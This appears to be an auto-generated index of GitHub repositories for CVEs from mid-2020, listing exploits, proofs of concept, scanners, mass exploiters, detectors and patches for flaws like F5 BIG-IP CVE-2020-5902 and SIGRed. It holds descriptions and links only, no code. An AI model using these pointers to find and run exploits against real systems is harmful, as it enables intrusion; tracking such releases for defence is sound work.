**no description** : [n0lann/CVE2010-3301_compiled](https://github.com/n0lann/CVE2010-3301_compiled) create time: 2020-07-15T21:58:28Z

**Windows registry mitigation response to CVE-2020-1350** : [jmaddington/dRMM-CVE-2020-1350-response](https://github.com/jmaddington/dRMM-CVE-2020-1350-response) create time: 2020-07-15T19:43:39Z

**PoC for CVE-2020-6287, CVE-2020-6286 (SAP RECON vulnerability)** : [chipik/SAP_RECON](https://github.com/chipik/SAP_RECON) create time: 2020-07-15T15:20:09Z

**no description** : [ctlyz123/CVE-2020-8193](https://github.com/ctlyz123/CVE-2020-8193) create time: 2020-07-15T14:43:03Z

**no description** : [shivam18u/CVE-2018-6574](https://github.com/shivam18u/CVE-2018-6574) create time: 2020-07-15T08:38:28Z

**A proof of concept for CVE-2020-8958 written in Python.** : [qurbat/gpon](https://github.com/qurbat/gpon) create time: 2020-07-15T08:10:01Z

**Detection of attempts to exploit Microsoft Windows DNS server via CVE-2020-1350 (AKA SIGRed)** : [corelight/SIGRed](https://github.com/corelight/SIGRed) create time: 2020-07-15T05:55:20Z

**This Powershell Script is checking if your server is vulnerable for the CVE-2020-1350 Remote Code Execution flaw in the Windows DNS Service** : [T13nn3s/CVE-2020-1350](https://github.com/T13nn3s/CVE-2020-1350) create time: 2020-07-15T05:46:31Z

**Bash Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2003 up to Windows Server 2019.** : [tinkersec/cve-2020-1350](https://github.com/tinkersec/cve-2020-1350) create time: 2020-07-14T22:45:48Z

**Fake exploit tool, designed to rickroll users attempting to actually exploit.** : [zoomerxsec/Fake_CVE-2020-1350](https://github.com/zoomerxsec/Fake_CVE-2020-1350) create time: 2020-07-14T21:55:57Z

**no description** : [mr-r3b00t/CVE-2020-1350](https://github.com/mr-r3b00t/CVE-2020-1350) create time: 2020-07-14T19:28:46Z

**HoneyPoC: Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2000 up to Windows Server 2019.** : [ZephrFish/CVE-2020-1350](https://github.com/ZephrFish/CVE-2020-1350) create time: 2020-07-14T19:02:25Z

**CVE-2020-0796. Smbghost Local Privilege Escalation** : [5l1v3r1/smbghost-5](https://github.com/5l1v3r1/smbghost-5) create time: 2020-07-14T03:49:09Z

**[CVE-2020-1948] Apache Dubbo Provider default deserialization cause RCE** : [L0kiii/Dubbo-deserialization](https://github.com/L0kiii/Dubbo-deserialization) create time: 2020-07-14T02:42:41Z

**Location tracking app without location permissions! Makes use of CVE-2018-15835 which makes use of Android OS information leakage.** : [Chirantar7004/Android-Passive-Location-Tracker](https://github.com/Chirantar7004/Android-Passive-Location-Tracker) create time: 2020-07-13T20:43:36Z

**quick and dirty PHP RCE proof of concept** : [corifeo/CVE-2019-11043](https://github.com/corifeo/CVE-2019-11043) create time: 2020-07-13T16:32:15Z

**TeamViewer Store Credentials Decryption** : [mr-r3b00t/CVE-2019-18988](https://github.com/mr-r3b00t/CVE-2019-18988) create time: 2020-07-13T15:30:02Z

**no description** : [norrismw/CVE-2020-9047](https://github.com/norrismw/CVE-2020-9047) create time: 2020-07-13T14:40:34Z

**Scanning for CVE-2020-8193 - Auth Bypass check** : [PR3R00T/CVE-2020-8193-Citrix-Scanner](https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner) create time: 2020-07-13T10:36:43Z

**Stored XSS in InterMind iMind Server through 3.13.65 allows any user to hijack another user's session by sending a malicious file in the chat.** : [h3llraiser/CVE-2020-25399](https://github.com/h3llraiser/CVE-2020-25399) create time: 2020-07-13T09:37:38Z

**CSV Injection exists in InterMind iMind Server through 3.13.65 via the csv export functionality.** : [h3llraiser/CVE-2020-25398](https://github.com/h3llraiser/CVE-2020-25398) create time: 2020-07-13T09:37:11Z

**Prueba de CVE-2019-1351** : [JonasDL/PruebaCVE20191351](https://github.com/JonasDL/PruebaCVE20191351) create time: 2020-07-13T00:33:43Z

**no description** : [M0NsTeRRR/CVE-2020-24033](https://github.com/M0NsTeRRR/CVE-2020-24033) create time: 2020-07-13T00:25:58Z

**no description** : [xElkomy/CVE-2018-11235](https://github.com/xElkomy/CVE-2018-11235) create time: 2020-07-12T14:52:51Z

**no description** : [momika233/cve-2020-5902](https://github.com/momika233/cve-2020-5902) create time: 2020-07-12T14:37:25Z

**This Metasploit-Framework module can be use to help companies to check the last Citrix vulnerability CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196 (disclosed July 08, 2020).** : [Zeop-CyberSec/citrix_adc_netscaler_lfi](https://github.com/Zeop-CyberSec/citrix_adc_netscaler_lfi) create time: 2020-07-12T13:37:53Z

**Citrix ADC从权限绕过到RCE** : [Airboi/Citrix-ADC-RCE-CVE-2020-8193](https://github.com/Airboi/Citrix-ADC-RCE-CVE-2020-8193) create time: 2020-07-12T13:05:40Z

**CVE-2020-5902** : [Al1ex/CVE-2020-5902](https://github.com/Al1ex/CVE-2020-5902) create time: 2020-07-11T14:01:08Z

**CVE-2018-1297** : [xDro1d/CVE-2018-1297](https://github.com/xDro1d/CVE-2018-1297) create time: 2020-07-11T04:11:19Z

**Mass exploit for CVE-2020-5902** : [pwnhacker0x18/CVE-2020-5902-Mass](https://github.com/pwnhacker0x18/CVE-2020-5902-Mass) create time: 2020-07-10T21:43:11Z

**Citrix ADC Vulns** : [jas502n/CVE-2020-8193](https://github.com/jas502n/CVE-2020-8193) create time: 2020-07-10T20:00:17Z

**F5 BIG-IP RCE CVE-2020-5902 automatic check tool** : [theLSA/f5-bigip-rce-cve-2020-5902](https://github.com/theLSA/f5-bigip-rce-cve-2020-5902) create time: 2020-07-10T15:33:00Z

**批量检测CVE-2020-5902** : [qiong-qi/CVE-2020-5902-POC](https://github.com/qiong-qi/CVE-2020-5902-POC) create time: 2020-07-10T07:49:23Z

**Checker CVE-2020-5902: BIG-IP versions 15.0.0 through 15.1.0.3, 14.1.0 through 14.1.2.5, 13.1.0 through 13.1.3.3, 12.1.0 through 12.1.5.1, and 11.6.1 through 11.6.5.1 suffer from Traffic Management User Interface (TMUI) arbitrary file read and command execution vulnerabilities.** : [MrCl0wnLab/checker-CVE-2020-5902](https://github.com/MrCl0wnLab/checker-CVE-2020-5902) create time: 2020-07-10T07:00:35Z

**Exploits for CVE-2020-9376 and CVE-2020-9377** : [renatoalencar/dlink-dir610-exploits](https://github.com/renatoalencar/dlink-dir610-exploits) create time: 2020-07-09T22:48:51Z

**修改的poc,适用于python3** : [qiong-qi/CVE-2019-19781-poc](https://github.com/qiong-qi/CVE-2019-19781-poc) create time: 2020-07-09T14:26:02Z

**Exploits for CVE-2020-5902 POC** : [itsjeffersonli/CVE-2020-5902](https://github.com/itsjeffersonli/CVE-2020-5902) create time: 2020-07-09T14:08:54Z

**Simple Vulnerability Checker Wrote by me "@TheCyberViking" and A fellow Researcher who wanted to be left Nameless... you know who you are you beautiful bitch** : [TheCyberViking/CVE-2020-5902-Vuln-Checker](https://github.com/TheCyberViking/CVE-2020-5902-Vuln-Checker) create time: 2020-07-09T14:01:29Z

**F5 Big-IP CVE-2020-5902 mass exploiter/fuzzer.** : [d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter](https://github.com/d4rk007/F5-Big-IP-CVE-2020-5902-mass-exploiter) create time: 2020-07-09T08:34:37Z

**no description** : [Shu1L/CVE-2020-5902-fofa-scan](https://github.com/Shu1L/CVE-2020-5902-fofa-scan) create time: 2020-07-09T07:44:07Z

**Information about Kubernetes CVE-2020-8558, including proof of concept exploit.** : [tabbysable/POC-2020-8558](https://github.com/tabbysable/POC-2020-8558) create time: 2020-07-09T06:56:07Z

**Script para validar CVE-2020-5902 hecho en Go.** : [deepsecurity-pe/GoF5-CVE-2020-5902](https://github.com/deepsecurity-pe/GoF5-CVE-2020-5902) create time: 2020-07-09T06:09:39Z

**no description** : [SharpHack/CVE-2019-19781](https://github.com/SharpHack/CVE-2019-19781) create time: 2020-07-09T05:17:07Z

**no description** : [M3g4Byt3/cve-2020-1948-poc](https://github.com/M3g4Byt3/cve-2020-1948-poc) create time: 2020-07-09T02:27:54Z

**F5 BIG IP Scanner for CVE-2020-5902** : [halencarjunior/f5scan](https://github.com/halencarjunior/f5scan) create time: 2020-07-08T21:57:37Z

**A powershell script to check vulnerability CVE-2020-5902 of ip list** : [renanhsilva/checkvulnCVE20205902](https://github.com/renanhsilva/checkvulnCVE20205902) create time: 2020-07-08T21:50:32Z

**no description** : [dnerzker/CVE-2020-5902](https://github.com/dnerzker/CVE-2020-5902) create time: 2020-07-08T16:22:53Z

**It is a small script to fetch out the subdomains/ip vulnerable to CVE-2020-5902 written in bash** : [GovindPalakkal/EvilRip](https://github.com/GovindPalakkal/EvilRip) create time: 2020-07-08T10:38:35Z

**no description** : [Harish4948/CVE_2019_15813-lab](https://github.com/Harish4948/CVE_2019_15813-lab) create time: 2020-07-08T08:50:22Z

**F5 BIG-IP 任意文件读取+远程命令执行RCE** : [zhzyker/CVE-2020-5902](https://github.com/zhzyker/CVE-2020-5902) create time: 2020-07-08T04:02:07Z

**POC** : [ajdumanhug/CVE-2020-5902](https://github.com/ajdumanhug/CVE-2020-5902) create time: 2020-07-07T19:07:55Z

**no description** : [trump88/CVE-2020-24765](https://github.com/trump88/CVE-2020-24765) create time: 2020-07-07T17:15:57Z

**F5 mass scanner and CVE-2020-5902 checker** : [cristiano-corrado/f5_scanner](https://github.com/cristiano-corrado/f5_scanner) create time: 2020-07-07T15:17:13Z

**Scan from a given list for F5 BIG-IP and check for CVE-2020-5902** : [inho28/CVE-2020-5902-F5-BIGIP](https://github.com/inho28/CVE-2020-5902-F5-BIGIP) create time: 2020-07-07T11:42:34Z

**no description** : [k3nundrum/CVE-2020-5902](https://github.com/k3nundrum/CVE-2020-5902) create time: 2020-07-07T11:31:31Z

**Artica Proxy before 4.30.000000 Community Edition allows Reflected Cross Site Scripting.** : [pratikshad19/CVE-2020-15053](https://github.com/pratikshad19/CVE-2020-15053) create time: 2020-07-07T09:21:30Z

**Artica Proxy before 4.30.000000 Community Edition allows SQL Injection.** : [pratikshad19/CVE-2020-15052](https://github.com/pratikshad19/CVE-2020-15052) create time: 2020-07-07T09:13:18Z

**CVE-2020-15051 : Artica Proxy before 4.30.000000 Community Edition allows Stored Cross Site Scripting.** : [pratikshad19/CVE-2020-15051](https://github.com/pratikshad19/CVE-2020-15051) create time: 2020-07-07T06:11:04Z

**no description** : [Any3ite/CVE-2020-5902-F5BIG](https://github.com/Any3ite/CVE-2020-5902-F5BIG) create time: 2020-07-07T05:32:46Z

**Fix CVE-2020-5902** : [wdlid/CVE-2020-5902-fix](https://github.com/wdlid/CVE-2020-5902-fix) create time: 2020-07-07T03:16:02Z

**F5 BIG-IP Scanner (CVE-2020-5902)** : [jiansiting/CVE-2020-5902](https://github.com/jiansiting/CVE-2020-5902) create time: 2020-07-07T02:03:39Z

**Patch F5 appliance CVE-2020-5902** : [GoodiesHQ/F5-Patch](https://github.com/GoodiesHQ/F5-Patch) create time: 2020-07-06T19:07:33Z

**CVE-2020-5902** : [jinnywc/CVE-2020-5902](https://github.com/jinnywc/CVE-2020-5902) create time: 2020-07-06T15:49:46Z

**SMBGhost (CVE-2020-0796) and SMBleed (CVE-2020-1206) Scanner** : [ZecOps/SMBGhost-SMBleed-scanner](https://github.com/ZecOps/SMBGhost-SMBleed-scanner) create time: 2020-07-06T14:45:07Z

**Python script to check CVE-2020-5902 (F5 BIG-IP devices).** : [0xAbdullah/CVE-2020-5902](https://github.com/0xAbdullah/CVE-2020-5902) create time: 2020-07-06T14:41:29Z

**Auth Bypass PoC for Kiali** : [jpts/cve-2020-1764-poc](https://github.com/jpts/cve-2020-1764-poc) create time: 2020-07-06T13:59:52Z

**no description** : [Zinkuth/F5-BIG-IP-CVE-2020-5902](https://github.com/Zinkuth/F5-BIG-IP-CVE-2020-5902) create time: 2020-07-06T13:30:44Z

**dummy poc** : [qlkwej/poc-CVE-2020-5902](https://github.com/qlkwej/poc-CVE-2020-5902) create time: 2020-07-06T10:36:07Z

**批量扫描CVE-2020-5902,远程代码执行,已测试** : [lijiaxing1997/CVE-2020-5902-POC-EXP](https://github.com/lijiaxing1997/CVE-2020-5902-POC-EXP) create time: 2020-07-06T09:16:36Z

**CVE-2020-5902 scanner** : [cybersecurityworks553/scanner-CVE-2020-5902](https://github.com/cybersecurityworks553/scanner-CVE-2020-5902) create time: 2020-07-06T06:58:29Z

**no description** : [sv3nbeast/CVE-2020-5902_RCE](https://github.com/sv3nbeast/CVE-2020-5902_RCE) create time: 2020-07-06T06:45:21Z

**cve-2020-5902 POC exploit** : [r0ttenbeef/cve-2020-5902](https://github.com/r0ttenbeef/cve-2020-5902) create time: 2020-07-06T05:11:37Z

**Python script to exploit F5 Big-IP CVE-2020-5902** : [dunderhay/CVE-2020-5902](https://github.com/dunderhay/CVE-2020-5902) create time: 2020-07-06T04:03:58Z

**CVE-2020-27199** : [9lyph/CVE-2020-27199](https://github.com/9lyph/CVE-2020-27199) create time: 2020-07-06T03:10:34Z

**BIG-IP F5 Remote Code Execution** : [JSec1337/RCE-CVE-2020-5902](https://github.com/JSec1337/RCE-CVE-2020-5902) create time: 2020-07-06T02:21:18Z

**exploit code for F5-Big-IP (CVE-2020-5902)** : [yasserjanah/CVE-2020-5902](https://github.com/yasserjanah/CVE-2020-5902) create time: 2020-07-06T01:12:23Z

**CVE-2020-13640 - SQL injection in wpDiscuz WordPress plugin <= 5.3.5** : [asterite3/CVE-2020-13640](https://github.com/asterite3/CVE-2020-13640) create time: 2020-07-05T20:22:16Z

**no description** : [nsflabs/CVE-2020-5902](https://github.com/nsflabs/CVE-2020-5902) create time: 2020-07-05T20:16:07Z

**Proof of Concept for CVE-2020-5902** : [Un4gi/CVE-2020-5902](https://github.com/Un4gi/CVE-2020-5902) create time: 2020-07-05T18:29:37Z

**no description** : [rwincey/CVE-2020-5902-NSE](https://github.com/rwincey/CVE-2020-5902-NSE) create time: 2020-07-05T17:51:38Z

**Proof of concept for CVE-2020-5902** : [yassineaboukir/CVE-2020-5902](https://github.com/yassineaboukir/CVE-2020-5902) create time: 2020-07-05T17:01:27Z

**POC code for checking for this vulnerability. Since the code has been released, I decided to release this one as well. Patch Immediately!** : [ar0dd/CVE-2020-5902](https://github.com/ar0dd/CVE-2020-5902) create time: 2020-07-05T16:38:36Z

**CVE-2020-5902 BIG-IP** : [jas502n/CVE-2020-5902](https://github.com/jas502n/CVE-2020-5902) create time: 2020-07-05T16:38:32Z

**Automated script for F5 BIG-IP scanner (CVE-2020-5902) using hosts retrieved from Shodan API.** : [aqhmal/CVE-2020-5902-Scanner](https://github.com/aqhmal/CVE-2020-5902-Scanner) create time: 2020-07-05T06:19:09Z

**AnyView** : [y5s5k5/CVE-2020-23741](https://github.com/y5s5k5/CVE-2020-23741) create time: 2020-07-04T23:41:12Z

**no description** : [snappyJack/Rick_write_exp_CVE-2020-8835](https://github.com/snappyJack/Rick_write_exp_CVE-2020-8835) create time: 2020-07-04T15:51:14Z

**CVE-2020-5902** : [dwisiswant0/CVE-2020-5902](https://github.com/dwisiswant0/CVE-2020-5902) create time: 2020-07-04T14:12:57Z

**Simple OpenSSL TLS Heartbeat (CVE-2014-0160) Scanner and Exploit (Multiple SSL/TLS versions)** : [rouze-d/heartbleed](https://github.com/rouze-d/heartbleed) create time: 2020-07-04T11:46:51Z

**no description** : [Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit](https://github.com/Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit) create time: 2020-07-04T06:06:52Z

**no description** : [Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit](https://github.com/Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit) create time: 2020-07-04T05:54:58Z

**Apache Dubbo CVE-2020-1948 漏洞测试环境,亲测可用。** : [txrw/Dubbo-CVE-2020-1948](https://github.com/txrw/Dubbo-CVE-2020-1948) create time: 2020-07-04T02:06:28Z

**Drive the elves** : [y5s5k5/CVE-2020-23740](https://github.com/y5s5k5/CVE-2020-23740) create time: 2020-07-04T00:24:12Z

**RCE exploit for AVideo < 8.9 (CVE-2020-23489 & CVE-2020-23490)** : [ahussam/AVideo3xploit](https://github.com/ahussam/AVideo3xploit) create time: 2020-07-03T17:27:12Z

**CVE-2020-7693: SockJS 0.3.19 Denial of Service POC** : [andsnw/sockjs-dos-py](https://github.com/andsnw/sockjs-dos-py) create time: 2020-07-03T11:04:48Z

**no description** : [Kenun99/CVE-2019-16113-Dockerfile](https://github.com/Kenun99/CVE-2019-16113-Dockerfile) create time: 2020-07-03T08:37:43Z

**no description** : [TheRook/AudioCaptchaBypass-CVE-2008-2019](https://github.com/TheRook/AudioCaptchaBypass-CVE-2008-2019) create time: 2020-07-02T20:04:05Z

**The official exploit for OCS Inventory NG v2.7 Remote Command Execution CVE-2020-14947** : [mhaskar/CVE-2020-14947](https://github.com/mhaskar/CVE-2020-14947) create time: 2020-07-02T16:40:52Z

**Files for 2019-18935** : [Un4gi/CVE-2019-18935](https://github.com/Un4gi/CVE-2019-18935) create time: 2020-07-02T13:38:56Z

**no description** : [sirius-bl4ck/cve2018-6574](https://github.com/sirius-bl4ck/cve2018-6574) create time: 2020-07-02T10:23:25Z

**no description** : [ReverseBrain/CVE-2019-18988](https://github.com/ReverseBrain/CVE-2019-18988) create time: 2020-07-01T09:56:29Z

**Technical Write-Up on and PoC Exploit for CVE-2020-11519 and CVE-2020-11520** : [patois/winmagic_sd](https://github.com/patois/winmagic_sd) create time: 2020-06-30T23:01:33Z

**CVE-2020-12828 PoC and Analysis.** : [0xsha/ZombieVPN](https://github.com/0xsha/ZombieVPN) create time: 2020-06-30T15:18:58Z

**Brute Force on Supravizio BPM 10.1.2** : [inflixim4be/CVE-2020-15367](https://github.com/inflixim4be/CVE-2020-15367) create time: 2020-06-30T15:08:01Z

**User Enumeration on Supravizio BPM 10.1.2** : [inflixim4be/CVE-2020-15392](https://github.com/inflixim4be/CVE-2020-15392) create time: 2020-06-30T15:07:12Z

**Saibo Cyber Game Accelerator** : [y5s5k5/CVE-2020-23735](https://github.com/y5s5k5/CVE-2020-23735) create time: 2020-06-30T14:51:44Z

**Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Python3)** : [0xtz/CVE-2006-3392](https://github.com/0xtz/CVE-2006-3392) create time: 2020-06-30T13:07:31Z

**CVE-2020-2021** : [mr-r3b00t/CVE-2020-2021](https://github.com/mr-r3b00t/CVE-2020-2021) create time: 2020-06-29T16:56:10Z

**no description** : [mooneee/CVE-2020-0121](https://github.com/mooneee/CVE-2020-0121) create time: 2020-06-28T00:26:58Z

**CVE-2013-2028 python exploit** : [m4drat/CVE-2013-2028-Exploit](https://github.com/m4drat/CVE-2013-2028-Exploit) create time: 2020-06-27T15:08:26Z

**no description** : [ctlyz123/CVE-2020-1948](https://github.com/ctlyz123/CVE-2020-1948) create time: 2020-06-27T10:47:22Z

**no description** : [cyberharsh/Shellbash-CVE-2014-6271](https://github.com/cyberharsh/Shellbash-CVE-2014-6271) create time: 2020-06-26T11:08:22Z

**no description** : [cyberharsh/DrupalCVE-2018-7602](https://github.com/cyberharsh/DrupalCVE-2018-7602) create time: 2020-06-25T12:06:07Z

**POC for CVE-2020-10665 Docker Desktop Local Privilege Escalation** : [spaceraccoon/CVE-2020-10665](https://github.com/spaceraccoon/CVE-2020-10665) create time: 2020-06-25T07:35:29Z

**Bludit 3.9.2 - bruteforce bypass - CVE-2019-17240** : [LucaReggiannini/Bludit-3-9-2-bb](https://github.com/LucaReggiannini/Bludit-3-9-2-bb) create time: 2020-06-24T22:08:55Z

**no description** : [cyberharsh/Tomcat-CVE-2017-12615](https://github.com/cyberharsh/Tomcat-CVE-2017-12615) create time: 2020-06-24T21:14:41Z

**no description** : [cyberharsh/GoAhead-cve---2017--17562](https://github.com/cyberharsh/GoAhead-cve---2017--17562) create time: 2020-06-24T21:06:28Z

**cve2020-8835 PoC armv7** : [KashaMalaga/cve2020-8835](https://github.com/KashaMalaga/cve2020-8835) create time: 2020-06-24T15:56:34Z

**no description** : [cyberharsh/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-](https://github.com/cyberharsh/Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-) create time: 2020-06-24T12:15:07Z

**no description** : [cyberharsh/Php-unit-CVE-2017-9841](https://github.com/cyberharsh/Php-unit-CVE-2017-9841) create time: 2020-06-24T09:37:04Z

**no description** : [cyberharsh/Oracle-mysql-CVE-2012-2122](https://github.com/cyberharsh/Oracle-mysql-CVE-2012-2122) create time: 2020-06-24T06:26:02Z

**no description** : [cyberharsh/nginx-CVE-2017-7529](https://github.com/cyberharsh/nginx-CVE-2017-7529) create time: 2020-06-24T05:57:33Z

**POC exploit code for CVE-2020-1048(PrintDemon)** : [shubham0d/CVE-2020-1048](https://github.com/shubham0d/CVE-2020-1048) create time: 2020-06-23T18:45:24Z

**PoC of StrandHogg2 (CVE-2020-0096)** : [liuyun201990/StrandHogg2](https://github.com/liuyun201990/StrandHogg2) create time: 2020-06-23T05:43:15Z

**no description** : [shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui](https://github.com/shacojx/LifeRCEJsonWSTool-POC-CVE-2020-7961-Gui) create time: 2020-06-23T03:01:57Z

**TP-LINK Multiple HTML Injection Vulnerabilities** : [g-rubert/CVE-2020-14965](https://github.com/g-rubert/CVE-2020-14965) create time: 2020-06-23T01:23:26Z

**Python version of Metasploit exploit for CVE-2004-1561** : [darrynb89/CVE-2004-1561](https://github.com/darrynb89/CVE-2004-1561) create time: 2020-06-22T12:33:49Z

**no description** : [cyberharsh/Groovy-scripting-engine-CVE-2015-1427](https://github.com/cyberharsh/Groovy-scripting-engine-CVE-2015-1427) create time: 2020-06-22T05:00:22Z

**CVE-2018-6574: go get RCE solution for pentesterlab challenge** : [Malone5923/CVE-2018-6574-go-get-RCE](https://github.com/Malone5923/CVE-2018-6574-go-get-RCE) create time: 2020-06-21T20:43:53Z

**no description** : [prprhyt/PoC_TLS1_3_CVE-2020-13777](https://github.com/prprhyt/PoC_TLS1_3_CVE-2020-13777) create time: 2020-06-21T11:55:40Z

**no description** : [cdedmondson/Modified-CVE-2019-15107](https://github.com/cdedmondson/Modified-CVE-2019-15107) create time: 2020-06-20T19:03:03Z

**no description** : [cyberharsh/Mini_httpd-CVE-2018-18778](https://github.com/cyberharsh/Mini_httpd-CVE-2018-18778) create time: 2020-06-20T09:47:56Z

**no description** : [cyberharsh/Nginx-CVE-2013-4547](https://github.com/cyberharsh/Nginx-CVE-2013-4547) create time: 2020-06-20T09:37:58Z

**CVE-2020-8163 - Remote code execution of user-provided local names in Rails** : [lucasallan/CVE-2020-8163](https://github.com/lucasallan/CVE-2020-8163) create time: 2020-06-19T21:03:05Z

**no description** : [cyberharsh/Libssh-server-CVE-2018-10933](https://github.com/cyberharsh/Libssh-server-CVE-2018-10933) create time: 2020-06-19T20:53:39Z

**no description** : [cyberharsh/Apache-couchdb-CVE-2017-12635](https://github.com/cyberharsh/Apache-couchdb-CVE-2017-12635) create time: 2020-06-19T20:48:28Z

**This is an implementation of the CVE-2020-0796 aka SMBGhost vulnerability, compatible with the Metasploit Framework** : [Almorabea/SMBGhost-LPE-Metasploit-Module](https://github.com/Almorabea/SMBGhost-LPE-Metasploit-Module) create time: 2020-06-19T20:38:11Z

**CVE-2020-13159 - Artica Proxy before 4.30.000000 Community Edition allows OS command injection.** : [InfoSec4Fun/CVE-2020-13159](https://github.com/InfoSec4Fun/CVE-2020-13159) create time: 2020-06-19T15:43:19Z

**CVE-2020-13158 - Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal** : [InfoSec4Fun/CVE-2020-13158](https://github.com/InfoSec4Fun/CVE-2020-13158) create time: 2020-06-19T15:28:54Z

**CVE-2018-7600 0-Day Exploit (cyber-warrior.org)** : [ynsmroztas/drupalhunter](https://github.com/ynsmroztas/drupalhunter) create time: 2020-06-18T08:12:44Z

**CVE-2020-11881: unauthenticated remote DoS for MikroTik SMB service.** : [botlabsDev/CVE-2020-11881](https://github.com/botlabsDev/CVE-2020-11881) create time: 2020-06-17T12:15:56Z

**LPE for CVE-2020-1054 targeting Windows 7 x64** : [0xeb-bp/cve-2020-1054](https://github.com/0xeb-bp/cve-2020-1054) create time: 2020-06-16T23:22:15Z

**CVE-2020-5410 Spring Cloud Config directory traversal vulnerability** : [osamahamad/CVE-2020-5410-POC](https://github.com/osamahamad/CVE-2020-5410-POC) create time: 2020-06-16T20:15:58Z

**Support ALL Windows Version** : [cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION) create time: 2020-06-16T08:57:51Z

**A PoC for CVE-2020-8816 that does not use $PATH but $PWD and globbing** : [MartinSohn/CVE-2020-8816](https://github.com/MartinSohn/CVE-2020-8816) create time: 2020-06-15T18:24:19Z

**CVE Data Analysis, CVE Monitor, CVE EXP Prediction Based on Deep Learning. 1999-2020年存量CVE数据分析、监控CVE增量更新、基于深度学习的CVE EXP预测和自动化推送** : [404notf0und/CVE-Flow](https://github.com/404notf0und/CVE-Flow) create time: 2020-06-15T14:56:18Z

**Description and public exploit for CVE-2020-12712** : [SanderUbink/CVE-2020-12712](https://github.com/SanderUbink/CVE-2020-12712) create time: 2020-06-15T08:32:08Z

**no description** : [lushann/cve-2003-0282](https://github.com/lushann/cve-2003-0282) create time: 2020-06-14T12:54:58Z

**POC exploit for SMBLost vulnerability (CVE-2020-1301)** : [shubham0d/CVE-2020-1301](https://github.com/shubham0d/CVE-2020-1301) create time: 2020-06-13T18:24:26Z

**no description** : [networksecure/CVE-2020-14064](https://github.com/networksecure/CVE-2020-14064) create time: 2020-06-13T14:44:49Z

**Exploit for NGiX 1.6.2 Remote Integer Overflow Vulnerability CVE-2017-7529** : [cyberk1w1/CVE-2017-7529](https://github.com/cyberk1w1/CVE-2017-7529) create time: 2020-06-13T12:11:19Z

**no description** : [networksecure/CVE-2020-14066](https://github.com/networksecure/CVE-2020-14066) create time: 2020-06-13T08:57:45Z

**no description** : [networksecure/CVE-2020-14065](https://github.com/networksecure/CVE-2020-14065) create time: 2020-06-13T08:04:16Z

**for 供養** : [Goyotan/CVE-2020-6418-PoC](https://github.com/Goyotan/CVE-2020-6418-PoC) create time: 2020-06-13T07:32:24Z

**no description** : [fengjixuchui/CVE-2020-11493](https://github.com/fengjixuchui/CVE-2020-11493) create time: 2020-06-13T05:26:11Z

**CVE-2018-9995 هک دوربین مداربسته با آسیب پذیری** : [HACKGM/CVE-2018-9995](https://github.com/HACKGM/CVE-2018-9995) create time: 2020-06-13T05:00:21Z

**no description** : [freshdemo/ApacheStruts-CVE-2018-11776](https://github.com/freshdemo/ApacheStruts-CVE-2018-11776) create time: 2020-06-12T18:46:29Z

**Collection of information and files for the demonstration along with working PoC of CVE-2019-15813.** : [iamhrishikeshpadhye/CVE-2019-15813-Exploitation](https://github.com/iamhrishikeshpadhye/CVE-2019-15813-Exploitation) create time: 2020-06-12T15:05:33Z

**Challange CVE-2020-13777** : [shigeki/challenge_CVE-2020-13777](https://github.com/shigeki/challenge_CVE-2020-13777) create time: 2020-06-12T12:54:00Z

**cve-2020-0688 UNIVERSAL Python implementation utilizing ASPX webshell for command output** : [w4fz5uck5/cve-2020-0688-webshell-upload-technique](https://github.com/w4fz5uck5/cve-2020-0688-webshell-upload-technique) create time: 2020-06-12T08:28:35Z

**test** : [SnipJoe/CVE-2020-8888](https://github.com/SnipJoe/CVE-2020-8888) create time: 2020-06-12T02:37:26Z

**Vulnerble-code** : [it3x55/CVE-2018-6574](https://github.com/it3x55/CVE-2018-6574) create time: 2020-06-11T22:03:06Z

**CVE 2020-6096 PoC** : [KashaMalaga/cve2020-6096](https://github.com/KashaMalaga/cve2020-6096) create time: 2020-06-11T16:21:38Z

**CVE-2020-10749 PoC (Kubernetes MitM attacks via IPv6 rogue router advertisements)** : [knqyf263/CVE-2020-10749](https://github.com/knqyf263/CVE-2020-10749) create time: 2020-06-11T15:42:18Z

**Struts 2.5 - 2.5.12 REST Plugin XStream RCE** : [wifido/CVE-2017-9805-Exploit](https://github.com/wifido/CVE-2017-9805-Exploit) create time: 2020-06-11T07:36:56Z

**An example exploit for CVE-2017-7376** : [brahmstaedt/libxml2-exploit](https://github.com/brahmstaedt/libxml2-exploit) create time: 2020-06-11T06:55:32Z

**批量测试CVE-2020-0796 - SMBv3 RCE** : [1060275195/SMBGhost](https://github.com/1060275195/SMBGhost) create time: 2020-06-11T06:24:30Z

**SMBGhost (CVE-2020-0796) Automate Exploitation and Detection** : [Barriuso/SMBGhost_AutomateExploitation](https://github.com/Barriuso/SMBGhost_AutomateExploitation) create time: 2020-06-10T16:44:39Z

**Zeek Plugin that detects CallStranger (CVE-2020-12695) attempts (http://callstranger.com/)** : [corelight/callstranger-detector](https://github.com/corelight/callstranger-detector) create time: 2020-06-10T14:18:34Z

**no description** : [P1kAju/CVE-2020-1301](https://github.com/P1kAju/CVE-2020-1301) create time: 2020-06-10T08:21:53Z

**Bludit >= 3.9.2 - Authenticated RCE (CVE-2019-16113)** : [hg8/CVE-2019-16113-PoC](https://github.com/hg8/CVE-2019-16113-PoC) create time: 2020-06-09T12:39:10Z

**SMBv3 Ghost (CVE-2020-0796) Vulnerability** : [exp-sky/CVE-2020-0796](https://github.com/exp-sky/CVE-2020-0796) create time: 2020-06-09T06:18:54Z

**适配12.2.1.3和12.2.1.4版本** : [ZZZWD/CVE-2020-2883](https://github.com/ZZZWD/CVE-2020-2883) create time: 2020-06-09T05:23:11Z

